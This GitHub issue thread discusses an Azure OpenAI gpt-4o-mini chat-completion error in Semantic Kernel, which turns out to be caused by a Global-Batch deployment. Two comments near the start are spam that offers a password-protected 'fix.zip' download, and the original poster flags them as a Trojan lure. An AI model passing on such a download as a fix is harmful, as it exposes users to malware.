### ISSUE TITLE
Python: Azure Open AI gpt-4o-mini - chat completions not working

### ISSUE THREAD

**Issue by jamesmkfoo23** [microsoft/semantic-kernel#8362]
I'm getting error invoking SK plugin when using gpt-4o-mini model. 

```
llm_result = await self.kernel.invoke(
                plugin_name="plugin",
                function_name="func",
                description=current_description
            )
```

This is the error message:
openai.BadRequestError: Error code: 400 - {'error': {'code': 'OperationNotSupported', 'message': 'The chatCompletion operation does not work with the specified model, gpt-4o-mini. Please choose different model and try again. You can learn more about which models can be used with each operation here: https://go.microsoft.com/fwlink/?linkid=2197993.'}}

When will gpt-4o-mini be supported?

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jamesmkfoo23** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

@markwallace-microsoft how to delete this Trojan horse post?

**Comment by evchaki** [comment]
@RogerBarreto  can you take a look at this bug?

**Comment by evchaki** [comment]
@jamesmkfoo23 - thanks for sending this in.

**Comment by RogerBarreto** [comment]
@evchaki This seems to be an error happening from Azure API. (Azure or OpenAI)

@jamesmkfoo23 if you are targeting azure ensure the deployment is using the `gpt-4o-mini` model.

Attempting to use a different model than the deployed will give you the above error.

![image](https://github.com/user-attachments/assets/a6e51a14-4ccd-49ce-8d73-d48393ae87ab)

**Comment by jamesmkfoo23** [comment]
> @evchaki This seems to be an error happening from Azure API. (Azure or OpenAI)
> 
> @jamesmkfoo23 if you are targeting azure ensure the deployment is using the `gpt-4o-mini` model.
> 
> Attempting to use a different model than the deployed will give you the above error.
> 
> ![image](https://private-user-images.githubusercontent.com/19890735/361496413-a6e51a14-4ccd-49ce-8d73-d48393ae87ab.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODkzNTMsIm5iZiI6MTcyNDY4OTA1MywicGF0aCI6Ii8xOTg5MDczNS8zNjE0OTY0MTMtYTZlNTFhMTQtNGNjZC00OWNlLThkNzMtZDQ4MzkzYWU4N2FiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE2MTczM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTI5OTZjZjdlY2ZiZmJhNjU3ODEzMGJkOWNkNDEwZDI5YTJhYzI4NTAzZGRkOGQyYzAyZmQyZDc4ZGE5MGMwMDcmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.PeOEzu0eSzeCwl8RjZZ0fQyfg4KyMKm9JlNcdFMw-M0)

@RogerBarreto , yes I did deploy the gpt-4o-mini model
<img width="287" alt="image" src="https://github.com/user-attachments/assets/7a33ea5a-541a-4787-9a3f-147d77bbbffa">

Added the LLM service to kernel as I do with my other gpt-4o model:
import semantic_kernel.connectors.ai.open_ai as sk_oai
gpt_4o_mini_llm_service = sk_oai.AzureChatCompletion(
            service_id="gpt-4o-mini",

            api_key= os.getenv("AZURE_OPENAI_API_KEY"),
            endpoint= os.getenv("AZURE_OPENAI_ENDPOINT"),
            deployment_name= os.getenv("AZURE_OPENAI_GPT4OMINI_DEPLOYMENT_NAME"), 
            api_version= os.getenv("AZURE_OPENAI_API_VERSION")
        
        )

        self.kernel.add_service(gpt_4o_mini_llm_service)

Perhaps it isn't a SK issue but I am wondering if AOAI chat completions is actually supported for the gpt-4o-mini model. Another observation I have is that the "Open in Playground" option is greyed out for this model
<img width="430" alt="image" src="https://github.com/user-attachments/assets/28d672b0-665d-49d7-a46a-d0e6cbf27275">

**Comment by RogerBarreto** [comment]
Potentially is not supported although the documentation says they do support. 
One observation I have is that your deployment doesn't have a traditional endpoint like ours is called `Global-Batch`, and something might be related to that as well.

<img width="772" alt="image" src="https://github.com/user-attachments/assets/b4c20151-f1bb-47b8-bc99-4550abd45a98">

Suggest making an REST HTTP request and sending that error into their Azure repository.

**Comment by yashworlikar** [comment]
> Perhaps it isn't a SK issue but I am wondering if AOAI chat completions is actually supported for the gpt-4o-mini model. Another observation I have is that the "Open in Playground" option is greyed out for this model

@jamesmkfoo23 The "Global-batch" deployment type is based on [OpenAI's Batch API](https://platform.openai.com/docs/guides/batch) which I don't think is supported by Semantic kernel. 

You would need to create a deployment for `gpt-4o-mini` using `Standard` or the `Global Standard` deployment type for using it with chat completions

**Comment by jamesmkfoo23** [comment]
Thanks @RogerBarreto , @yashworlikar. I managed to deploy Global Standard on US EAST and the chat completions on playground is working. Will try using SK tomorrow and it should work.

**Comment by arnavjain** [comment]
@jamesmkfoo23 were you able to run this on Global Batch? @evchaki @RogerBarreto We can run it via UI Dashboard but not via code. Same error facing as faced by @jamesmkfoo23

**Comment by jamesmkfoo23** [comment]
> @jamesmkfoo23 were you able to run this on Global Batch? @evchaki @RogerBarreto We can run it via UI Dashboard but not via code. Same error facing as faced by @jamesmkfoo23

No, I did not try. I just went with Global Standard on supported region

**Comment by BensGitShell** [comment]
Hi all, I'm still getting the same error message despite ticking the completions box on the 4o-mini deployment column options. Is completions truly supported for 4o-mini yet?

**Comment by RogerBarreto** [comment]
@BensGitShell, thanks for reaching out, this error happens in the backend of Azure API, double check what is the version of your gpt-4o-mini deployment. Suggest checking with Azure support service for further guidance, might be a region limitation or another reason for the error.

**Comment by BensGitShell** [comment]
Thanks @RogerBarreto, will reach out to Azure support.
